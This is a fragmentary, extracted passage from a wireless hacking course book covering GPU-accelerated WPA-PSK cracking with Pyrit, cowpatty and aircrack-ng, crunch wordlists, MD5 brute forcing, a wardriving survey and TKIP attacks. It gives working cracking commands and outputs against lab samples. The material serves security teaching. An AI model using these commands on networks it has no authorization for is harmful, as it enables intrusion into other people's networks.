libmesaglu1-devel-7.0.2-1pclos2007.i58 ############################## [100%]
Drivers and development environment configuration 103
Status: Before uninstall, this module version was ACTIVE on this kernel.
nvidia-current.ko.gz:
- Uninstallation
- Deleting from: /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
- Original module
- No original module was found for this module on this kernel.
- Use the dkms install command to reinstall any previous module version.
------------------------------
Deleting module version: 177.82-1pclos2007
completely from the DKMS tree.
------------------------------
Done.
Stopping atd: [ OK ]
Starting atd: [ OK ]
Cleaning up / removing
dkms-nvidia-current-177.82-1pclos2007. ############################## [100%]
nvidia_177.xx-177.82-1pclos2007.i586 ############################## [100%]
Using `/etc/nvidia-current/ld.so.conf’ to provide `gl_conf’.
Building module:
104 Chapter 6 – CUDA-powered attacks
nvidia-current.ko.gz:
- Original module
- No original module exists within this kernel
- Installation
- Installing to /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
depmod.......
========================================
========================================
In the next step, move to the SDK directory and compile the sources.
The platform has been installed. Let’s see if it runs properly by using
the SDK sample codes.
Test PASSED
As you can see in the listing above, the device and CUDA drivers
have been detected. SDK and CUDA-Toolkit are running and ready
to use when needed.
http://docs.nvidia.com/cuda/index.html
Drivers and development environment configuration 107
Cowpatty
Cowpatty is a dictionary cracker that can be used to defeat a wireless
key. It makes use of a submitted passphrase and ESSID list or
a precomputed hash table.
Installation
Navigate again to the cuda-ext directory:
Pyrit
Installation
Pyrit is a WPA-PSK and WPA2-PSK cracker available for free under
the GNU General Public License, and currently is the most efficient
tool to exploit multicore platforms and the following technologies:
ATI-Stream, NVIDIA CUDA, OpenCL and VIA Padlock. Within
the scope of this work, we focus on CUDA.
Navigate to cuda-ext:
...
...
#1: ‘CUDA-Device #1 ‘GeForce 9600M GT’’: 1472.8 PMKs/s (Occ. 99.4%; RTT 2.9)
#2: ‘CPU-Core (SSE2)’: 417.1 PMKs/s (Occ. 96.4%; RTT 2.9)
1472 PMKs/s on this mobile video card is not striking but still it’s
a triple improvement in performance compared to the results of
the Core 2 Duo 2 GHz CPU.
Options
-e
-f
Commands
batch
Translates all database passwords into their PMKs and writes
them to the database. Add the -e option to restrict this command
to a single ESSID. All ESSIDs in the database will be processed if
it is skipped.
Example:
pyrit -e NETGEAR batch
benchmark
Determines the peak-performance of the available hardware by
computing dummy-results.
112 Chapter 6 – CUDA-powered attacks
Example:
pyrit benchmark
create_essid
Adds a new ESSID given by the -e option to the database.
Example:
pyrit -e NETGEAR create_essid
delete_essid
Deletes an ESSID specified by the -e option.
Example:
pyrit -e NETGEAR delete_essid
eval
Counts all available passwords and the results for every ESSIDs
stored in the database.
Example:
pyrit eval
export_cowpatty
Writes the results for an ESSID specified by -e to a file specified
by the -f option in cowpatty format. Note that existing files will
be overwritten without a confirmation prompt.
Example:
pyrit -f NETGEAR.cow -e NETGEAR export_cowpatty
export_hashdb
Drivers and development environment configuration 113
Example:
pyrit -f NETGEAR.db -e NETGEAR export_hashdb
export_passwords
Writes all passwords stored in the database to a new file given
in -f. Note that existing files will be overwritten without
a confirmation prompt.
Example:
pyrit -f myword.txt.gz export_passwords
import_passwords
Reads passwords from the file given in -f to the database.
The passwords may contain all characters except for the newline
character \n. The passwords that cannot be used to crack
WPA-/WPA2-PSK will be omitted. Pyrit will only import
passwords and ignore duplicates.
Example:
pyrit -f dirty_words.txt import_passwords
list_cores
Prints the available hardware.
Example:
pyrit list_cores
114 Chapter 6 – CUDA-powered attacks
list_essids
Prints all available ESSIDs stored in the database. The function
is faster than eval when you do not need to know the number of
computed results for each respective ESSID.
Example:
pyrit list_essids
passthrough
Reads passwords from a file given in -f and computes their
PMKs for an ESSID given in -e. The results are printed directly
to the output file in cowpatty format and are not stored in the
database.
Example:
pyrit -f dirty_words.txt.gz -e NETGEAR passthrough |
cowpatty -d - -r wpatestcapture.cap -s NETGEAR
selftest
Runs a 60-second selftest to check the hardware printed
by list _ cores. The command may detect broken hardware.
Example:
pyrit selftest
verify
Randomly selects 10% of the results stored in the database and
recomputes them to verify their accuracy. The option can be used
in the case of a suspected hardware corruption.
Example:
pyrit -e NETGEAR verify
Drivers and development environment configuration 115
Aircrack-ng
An already familiar name, aircrack-ng is a suite of utilities designed
to execute a variety of attacks on wireless networks, from packet
capture and injection to WEP and WPA key cracking.
Installation
The following steps demonstrate how to install the latest stable
aircrack-ng package version with CUDA and sqlite support.
Section „Device”
Identifier „Videocard1”
Driver „nvidia”
VendorName „NVIDIA Corporation”
BoardName „GeForce 9600M GT”
BusID „PCI:3:0:0”
Screen 1
Option „AddARGBGLXVisuals” „true”
120 Chapter 6 – CUDA-powered attacks
Add the Option “Coolbits” “1” line exactly like in the example above
and save the file using F2. Press Esc to quit the editor. After the
changes are made, you need to restart the X server.
You can now arbitrarily change GPU and Memory clock rates.
The other option is to use nvclock. First, you need to compile and
install the utility in your system.
Installing nvclock
Move to the cuda-ext directory containing the archive. Unpack it.
-- Shader info --
Clock: 675.000 MHz
Stream units: 32 (00011b)
ROP units: 8 (00000011b)
-- Memory info --
Amount: 512 MB
Type: 128 bit DDR2
Clock: 799.200 MHz
-- PCI-Express info --
Current Rate: 1X
Maximum rate: 16X
-- Smartdimmer info --
Backlight level: 0%
-- Sensor info --
Sensor: GPU Internal Sensor
GPU temperature: 59C
-- VideoBios information --
Version: 62.94.1a.00.19
Signon message: G96 E566 NB9P-GS VGA BIOS
Performance level 0: gpu 275MHz/shader 550MHz/memory 250MHz/0.89V/100%
Performance level 1: gpu 400MHz/shader 800MHz/memory 400MHz/0.89V/100%
Performance level 2: gpu 500MHz/shader 1250MHz/memory 400MHz/1.05V/100%
VID mask: 3
Voltage level 0: 0.89V, VID: 1
Voltage level 1: 1.05V, VID: 0
Tweaking options:
Hardware options:
Test platform
All attacks presented below have been run on a midrange laptop
with the following specs:
Operating system:
Test files
The cuda-ext.tar.bz2 archive contains (in the hackme directory)
samples that have been used in the attacks below. These samples
are a great opportunity to learn and test your skills in a practical
environment.
List of files:
The parameters:
The parameters:
The first, and the slower of the two, requires an attacker to wait for
a user to connect with a wireless network.
Where:
Wait for the client to reconnect to the AP. Use aircrack-ng to check if
you have successfully captured the four-way handshake:
Where:
!
Note. The example uses a capture file found in the test resources.
If you have your own captures to process, adjust the filename
accordingly.
NOTE [root@localhost hackme]# aircrack-ng wpa-hackme-01.cap
Opening wpa-hackme-01.cap
Read 17068 packets.
As you see, 1 handshake has been captured. You can now move to
the next stages in cracking the test network’s key.
CUDA in action: WLAN attacks 129
Passthrough mode
As described, Pyrit can compute PMKs on the fly and pass them as
input to cowpatty, which verifies the correctness of the hashes.
Where:
The key has been found. The achieved rate is 1910 passwords per
second, and the key is recovered in about 4 minutes in a search space
of more than 450 thousand passphrases.
Where:
Where:
...
If you want to see the currently stored ESSIDs in the database, you
can run this command:
The parameters:
...
With all needed data loaded, you can start batch processing and
generate PMKs for the database. This can take some time depending
on the size of the used dictionary, but with CUDA, processing
should be even up to 100 times faster than the standard CPU
processing.
...
The data has been processed in a batch, and you can export the
computed PMK database both to cowpatty and aircrack-ng formats.
Both will be looked at; we will also showcase the two crackers.
134 Chapter 6 – CUDA-powered attacks
The parameters:
Exporting to ‘dict_hash.cowpatty’...
473986 entries written. All done.
You can now begin to crack the key using the exported table.
The parameters:
The parameters:
Master Key : D9 0D D5 39 05 27 10 23 DA D0 D9 1F B9 A6 34 74
1B 2C 01 81 F5 9F 3A E4 42 B4 01 EA 72 2F F0 07
Transient Key : 1C C0 26 E8 25 AA 23 2A D8 30 97 AD 1E 23 85 16
1F B3 1B F4 98 4E B4 2A 25 E4 B3 B3 75 24 5A B3
3F A1 CC D7 50 A5 55 9F 23 FD E2 FE 20 73 8A 0E
51 E8 E7 24 AD D2 85 6D D6 84 D0 4F 4E 91 EC 1F
EAPOL HMAC : 7D E8 8F 30 8F 5C 31 2C 2D D9 A4 28 46 FE DC 7F
Quitting aircrack-ng...
Airolib-ng
The latest utilities in the aircrack-ng package offer a hash generation
capability similar to Pyrit’s, and consequently if you do not want to
CUDA in action: WLAN attacks 137
use the Pyrit batch processing, you can instead turn to airolib-ng
for the feature.
The parameters:
Now, import an ESSID list from a file called essid.txt to the database:
The parameters:
Done.
The parameters:
Now, process the data into a hash table necessary to crack the key.
The parameters:
The attacks stop here. However, if you failed to find the key, you
could use bigger and more exhaustive dictionaries for the task.
Benchmark analysis
Key cracking
Tool Hash computing mode Elapsed Performance
time [s] [PMK/s]
cowpatty No precomputed hashes 5354,5 86,87
(dictionary file)
Aircrack-ng No precomputed hashes 564 863,08
(dictionary file)
cowpatty Passthrough 243,44 1910,69
cowpatty Batch processing 3,9 113825,61
Aircrack Batch processing 3 49765,98
If you plan to crack (your) networks with the same ESSIDs, batch
processing is a better choice. The batch mode requires you to process
hash tables only once, without needing to repeat the time-intensive
procedure with each new attack. Cracking itself should be swift.
Still, it is up to you to choose the method.
Right now, Pyrit is the fastest tool for generating hash tables from
password dictionaries and ESSID lists. It is more than ten times
faster than airolib-ng. While the performance of the utilities in
their upcoming versions is an unknown, Pyrit seems like the better
choice at this moment.
Dictionaries
Crunch is a popular utility that can do just that. You can send
the generated output to Pyrit or save it to a file.
Installation
The cuda-ext directory contains an archive with the tool. Unpack it.
or,
numeric = [0123456789]
numeric-space = [0123456789 ]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+
= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/]
ualpha-numeric-all-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/ ]
lalpha = [abcdefghijklmnopqrstuvwxyz]
lalpha-space = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%
^&*()-_+=”]
lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzäöüß0
123456789!@#$%^&*()-_+=” ]
lalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzäöüß
0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
lalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzäöüß0123456789
!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
mixalpha = [abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ ]
mixalpha-numeric = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789]
mixalpha-numeric-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
WXYZ0123456789 ]
mixalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP
QRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
144 Chapter 6 – CUDA-powered attacks
RSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
Examples
Let’s build a list of words 5 to 6 characters long, with only lowercase
alphanumeric characters allowed.
Wordlist.txt is the output dictionary file. If you need to, you can
define custom charsets in charset.lst.
Less experienced users have a bad habit of using a first name and
two digits denoting a birth year for passwords. The fixed pattern is
nameXX (X – digit). Thanks to crunch, you can effortlessly create
a list of possible passwords matching a given template for the name
Andrew:
andrew00
andrew01
...
andrew99
CUDA in action: WLAN attacks 145
What is MD5?
MD5 is a commonly used cryptographic hash function that can
transform any input into an encoded 128-bit hash. A widespread
application of MD5 is using it to verify the correctness of files, for
example packages downloaded from the Internet. By generating a
hash of the download and a hash of the original file, you can quickly
see if they match and whether the download could be corrupted.
Here’s the MD5 hash for the phrase ‘Hacking School Rulez’.
Brute force can be used to defeat MD5. That said, this process can be
quite time-consuming if the password to crack is long. Now, we are
going to test the Multiforcer and MD5 GPU Crack applications (both
make use of the advanced CUDA computing capability) and see how
they perform with hashes likes these.
CUDA-Multiforcer
CUDA-Multiforcer belongs to the most efficient MD4/MD5 and
NTLM hash cracking platforms. A GPU with CUDA support brings
the utility up to its full potential.
Appendix A: CUDA-powered cracking of MD4/MD5 hashes 147
Installation
Compile the Argtable library to be able to set up Multiforcer.
All the extensions can be found inside cuda-ext. Unpack
argtable2-11.tar.gz.
When this is done, you can move on to the tool proper. Unpack
Multiforcer.
[root@localhost argtable2-11]# cd ..
[root@localhost cuda-ext]# tar xfj CUDA-Multiforcer-src-0.7.tar.bz2
!
Note. You must have SDK installed to build CUDA-Multiforcer. Go
back to ‘Drivers and development environment configuration’ for
tips on how to install SDK.
Copy the Multiforcer directory to NVIDIA SDK and compile the NOTE
sources.
Examples
Below are the steps for cracking an MD5 hash. We will use the
sample hashes included in the tool.
Inside test _ hashes you’ll find sample files to crack, while charsets
contains files with specified character sets.
The parameters:
------------------------------------------
------------------------------------------
------------------------------------------
------------------------------------------
Appendix A: CUDA-powered cracking of MD4/MD5 hashes 151
------------------------------------------
Installation
The archive containing the tool can be found inside cuda-ext.
Unpack it.
[options]:
-d <CUDA device ID>: (default: the first CUDA device), see the -l
option to list the CUDA devices in the system
-s <start password>
Examples
We’ll use the benchmark mode to test the performance of
MD5 GPU Crack.
...
Benchmark Start
Using default CUDA GPU device:0
Cuda device ID:0, Device name:GeForce 9600M GT, supporting CUDA:1.1,
multiProcessorCount:4, clockRate:1250.00 MHz, TotalMem:511.69 MB
******* Test 0 Start *******
Expected Password: 1234567890
MD5 Hash:e807f1fcf82d132f9bb018ca6738a19f, Start Password:1200000000,
Total pwd to check:1000000000
Charset used 0:0123456789
MD5 brute force started
Progress 3%, Pwd:1232002520, Instant 45.72 Mhash/s(175.00 ms)
MD5 Cracked pwd=1234567890 hash=e807f1fcf82d132f9bb018ca6738a19f
Instant 47.06 Mhash/s(170.00 ms)
Average 46.52 Mhash/s, Total Time:0.86s(860.00 ms)
MD5 brute force finished
******* Test 0 End *******
Benchmark End
The benchmark shows that GPU MD5 Crack can allow you to crack
MD5 with a speed of 50 to 55 million hashes per second. This rate
is comparable to the results you can achieve with CUDA-Multiforcer.
Hardware
– Netbook Asus eeePC
– Bluetooth GPS
A moving car equipped with that gear enables quick travel and
picking necessary information within just several hours of driving.
Research methodology
Kismet saves discovered wireless network locations. All information
is written in the universal, easy-to-process CSV format. Using the
online app http://www.gpsvisualizer.com, it is possible to create
Appendix B: Wardriving experiment 157
Results
Here’s the most common ESSID names we have obtained in the
experiment.
Rainbow tables for only ten of the most popular ESSID values could
give us access to close to 20% of the tested networks. Other frequent
ESSIDs not on the list are popular first names. After expanding
them to add some common names, rainbow tables can wield a 40%
effectiveness in attacks against the networks in the test group.
Security Found %
None or WEP 575 38.3
WPA-TKIP 345 23
WPA-AES/WPA2 580 38.7
158 Chapter 6 – CUDA-powered attacks
The statistics are alarming. Almost four in ten wireless networks are
open or only use WEP, which provides next to no security, and as we
have proved on these pages, can be broken in a matter of minutes.
23% networks are protected, but not sufficiently so, only utilizing
the WPA TKIP mechanism that cannot guarantee strong security.
Summary
The experiment demonstrates that many users pay little attention
to securing themselves and their Wi-Fi networks. Most of the
times the communications inside a network could be captured by
an adversary, and over half of the analyzed networks use legacy
security solutions that need to be superseded or need their ESSIDs
reconfigured.
7
Chapter 7
Chapter outline:
1. WPA TKIP attack
2. WPA TKIP broken
3. Beck-Tews attack enhanced
4. Michael Reset attack
5. Summary
In this part of the lecture, we are going to cover the main points of
the attack. For everything else, consult the original text.
Creating a packet
To understand these additions better, below is a diagram showing
the process of creating an encrypted packet:
TA
Phase 1 WEP seed
TK TTAK (IV + RC4)
Key
mixing IV
Phase 2
TSC
Key RC4 Encrypted
mixing WEP
DA, SA, Priority, MPDU
Plaintext MSDU,
Data
Michael Fragmentation
MIC key Plaintext
MSDU + MIC
The next phase is a function that mixes the TTAK, the TK and the 16
least significant bits of the TSC. The output is the WEP seed: a 24-bit
initialization vector and a 104-bit RC4 key.
Michael takes the following values as input: the SA, DA, priority
and the MIC. As a result, the TSC and the generated MIC code are
fragmented and passed to the WEP block as plaintext. The rest of the
frame creation process is identical to the WEP encryption.
An encrypted frame:
Encrypted
MAC Extended
IV / KeyID Data (PDU) MIC ICV FCS
header IV
TKIP attack
Having covered the theoretical background of how TKIP
works, let’s now move on to the actual subject of this part of the
lecture. Erik Tews and Martin Beck have demonstrated how
a modified chopchop attack can be used to mount an attack
against TKIP. Implementing the exploit, an aircrack-ng
suite tool has been created for the purpose. Tkiptun-ng can
allow you to run the attack even if you know next to nothing
about the theory behind it. At present the utility is still under
development, and you can check for implementation updates here:
http://www.aircrack-ng.org/doku.php?id=tkiptun-ng
Requirements
There are serious limitations imposed on the attack. An access point
must support Quality of Service (QoS) features to allow for the usage
of the chopchop technique. Without QoS turned on, it would not
WKA TKIP attack 165
Another restriction is the key renewal time. After this time, a new
session key (TK, Temporal Key) is negotiated. As a rule of thumb,
the Key Renewal Interval is set in the AP to 3,600 seconds (an hour).
The attack needs to end under an hour from its start; otherwise it
would need to be executed again from scratch. Compared with the
standard chopchop, the attack takes longer as it has to deal with an
anti-brute force solution, the MIC failure holdoff time mechanism.
Attack stages:
1. Deauthentication
2. Modified chopchop
4. Reversing Michael
START
Deauthenticate
Done YES
chopping
bytes?
NO Guess IP address
ICV
Guess byte NO correct?
YES YES
MIC NO Number
Reverse Michael
of guesses
failure?
<256?
YES NO
The modified chopchop attack cuts off the last byte and attempts
to guess the encrypted value. If your particular guess is wrong
for a byte, the ICV and MIC values should not be correct and the
WKA TKIP attack 167
Countermeasures
One of the effective remedies against the TKIP attack (without
disabling QoS enhancements) is setting the Key Renewal Interval
low, for example to 120 seconds. This meant you could not decrypt
more than 2 bytes using the chopchop attack. Still, protocols other
than WPA with TKIP are more recommended, for example WPA2
CCMP, which is based on AES. However, even disabling QoS
support offers just a degree of security rather than total protection.
WPA TKIP broken 169
Ohigashi and Morii propose two variants of the MITM attack. The
first model assumes the access point and client cannot hear one
another due to the distance between them.
AP Attacker
Client
Directional antenna
AP Attacker
Client
Keep in mind that the packets flowing in WLANs are mostly ARP
and IPv4 packets. The chopchop exploit in Beck and Tews builds on
ARP packets whose content, as you know, can be easily guessed. The
attack allows you to receive 40 bytes of keystream.
Beck’s new adoption of the attack uses both ARP and IPv4 packets.
The researcher assumes that the 8-byte LLC header prepending both
IPv4 and ARP packets is fully known.
ARP and IP packets are both prepended with the 8-byte LLC
header, which is fully known. This means you can get another
8 bytes of keystream with no effort. As a result, you can use 12 bytes
of keystream, all recovered simply from the way the IP packet is
constructed.
At initialization, two key words are set that act as the internal state.
Based on the set state (the key words), the next 32-bit words are
generated.
What this implies is that you may be able to add an extra data
fragment to an unknown packet in such a way that the MIC value
for the entire packet does not change. For this to work, you need
to derive two ‘magic words’ that match both the inserted and the
original packet so that the internal state of Michael is reset.
Overall, the essence of the attack is combining two packets in such a way
that an unknown MIC value remains valid for the resultant packet.
Summary
TKIP attacks are still under development, and become more refined
with each passing month. Unfortunately, overcoming one set of
restrictions only leads to adopting even more stringent limitations.
According to the attack’s author, a successful injection of several
hundred data bytes is only possible if a targeted network includes
a Linux-based device and a victim client has open TCP ports.
Summary
The guide has examined the main points of 802.11 and its
successor protocols. You can now name the interrupters in popular
WLANs, and have learned the measures preventing intrusions
and encryption algorithms used in Wi-Fi networks. You also
should be more fully aware of the perils facing wireless users and
administrators, and can quickly break into WEP networks in
a variety of ways. We have also shown you several WPA exploits
which are not effective yet.
References
10. http://www.aircrack-ng.org/
11. http://dl.aircrack-ng.org/breakingwepandwpa.pdf
12. http://packetstormsecurity.com/files/80654/A-Practical-
Message-Falsification-Attack-On-WPA.html
13. http://download.aircrack-ng.org/wiki-files/doc/enhanced _
tkip _ michael.pdf
Notes
Notes
Notes
Notes
Notes
Notes
Notes
Notes